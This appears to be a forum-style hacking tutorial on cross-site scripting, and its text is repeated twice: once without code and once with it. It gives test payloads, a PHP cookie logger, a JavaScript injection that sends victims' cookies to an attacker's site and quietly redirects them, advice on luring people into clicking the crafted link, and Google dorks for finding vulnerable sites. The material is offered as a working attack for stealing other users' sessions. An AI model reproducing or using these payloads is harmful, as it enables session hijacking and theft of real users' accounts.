Hello there and welcome to my guide to XSS
Before we start what is XSS? let's come to basic !! hmm what is cookie? No, i don't mean the cookies you eat.
Cookie:
A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on websites.
CROSS SITE SCRIPTING or XSS:
Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage.
SOME POINTS ON XSS :
@ -XSS attacks almost always focus upon sites which use cookies for storing our username and password.
@-XSS is used to harm the website (may be defacing ).
OKay so lets get started now here
the usual types: type1 , type2, type3
type 1 =DOM-based:
DOM-based is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the slave’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious
modifications that have occurred in the DOM environment.
type 2 = Non Persistence:
:It means that the injected code is not permanent and is for small time till the user is on page or having the url with malicious code.
type 3 = Persistence :
It means that the injected code is permanent and will stay on the site and output can be seen by any user of site.
Now the question is how to check whether the site is xss vulnerable or not ?
There are two methods to check this:
1.POST:: http://www.target.com/search.php ( we put malacious code in search engine)
2.GET: http://www.target.com/search=<script>alert("xss");</script>
We directly put the script in url of browser.
what else we can do ..??
-->Insert image:
-->Insert message:
<b>this is hacked </b>
-->Redirect to your page :
But main aim of xss is to steal cookies so here is cookie stealing.
COOKIE STEALING TUTORIAL:
now how to use this code???
This is done by three-step process consisting of the injected script, the cookie recorder, and the log file.
First you'll need to get an account on a server and create two files, log.txt and giveyourname.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (give your name.php) [code metion above].
above script will record the cookies of every user that views it.
now above code is injected to the xss vulnerable site page via get or post method: what does this code do??
The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.
If this code works then you'll automatically gets the cookie in yoursite, other wise you have to do some hard work !! grab the link which you get after the insertion of above script. And manually get someone to use that link if necessary. o0ps all s done at this point.
##All you need to do now is go to your website and check the log file
You can try and look here =
That's it, thanks for reading my tutorial, more to come !
There are some dorks you can use on google to find XSS websites.
Before we start what is XSS? let's come to basic !! hmm what is cookie? No, i don't mean the cookies you eat.
Cookie:
A cookie is the variable that web-browsers use to store your login credentials. Without a cookie, you cannot "stay logged in" on websites.
CROSS SITE SCRIPTING or XSS:
Cross-Site Scripting is the process of injecting JavaScript (mainly) and also HTML into a webpage.
SOME POINTS ON XSS :
@ -XSS attacks almost always focus upon sites which use cookies for storing our username and password.
@-XSS is used to harm the website (may be defacing ).
OKay so lets get started now here
the usual types: type1 , type2, type3
type 1 =DOM-based:
DOM-based is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the slave’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious
modifications that have occurred in the DOM environment.
type 2 = Non Persistence:
:It means that the injected code is not permanent and is for small time till the user is on page or having the url with malicious code.
type 3 = Persistence :
It means that the injected code is permanent and will stay on the site and output can be seen by any user of site.
Now the question is how to check whether the site is xss vulnerable or not ?
There are two methods to check this:
1.POST:: http://www.target.com/search.php ( we put malacious code in search engine)
Code:
<script>alert(“xss”);</script>2.GET: http://www.target.com/search=<script>alert("xss");</script>
We directly put the script in url of browser.
what else we can do ..??
-->Insert image:
Code:
<img src=“url of the image”></img>-->Insert message:
<b>this is hacked </b>
-->Redirect to your page :
Code:
<script>window.open( "http://www.yoursite.com/" )</script>But main aim of xss is to steal cookies so here is cookie stealing.
COOKIE STEALING TUTORIAL:
Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>now how to use this code???
This is done by three-step process consisting of the injected script, the cookie recorder, and the log file.
First you'll need to get an account on a server and create two files, log.txt and giveyourname.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (give your name.php) [code metion above].
above script will record the cookies of every user that views it.
Code:
<script language= "JavaScript">document.location="http://yoursite.com/giveyourname.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>now above code is injected to the xss vulnerable site page via get or post method: what does this code do??
The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.
If this code works then you'll automatically gets the cookie in yoursite, other wise you have to do some hard work !! grab the link which you get after the insertion of above script. And manually get someone to use that link if necessary. o0ps all s done at this point.
##All you need to do now is go to your website and check the log file
You can try and look here =
Code:
SEARCH BOX
SHOUT BOX
BLOGS
COMMENT BOX
LOGIN BOX
FEEDBACK FORMSThat's it, thanks for reading my tutorial, more to come !
Code:
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
/preaspjobboard//Employee/emp_login.asp?msg1=
pages/match_report.php?mid= pages/match_report.php?mid=There are some dorks you can use on google to find XSS websites.
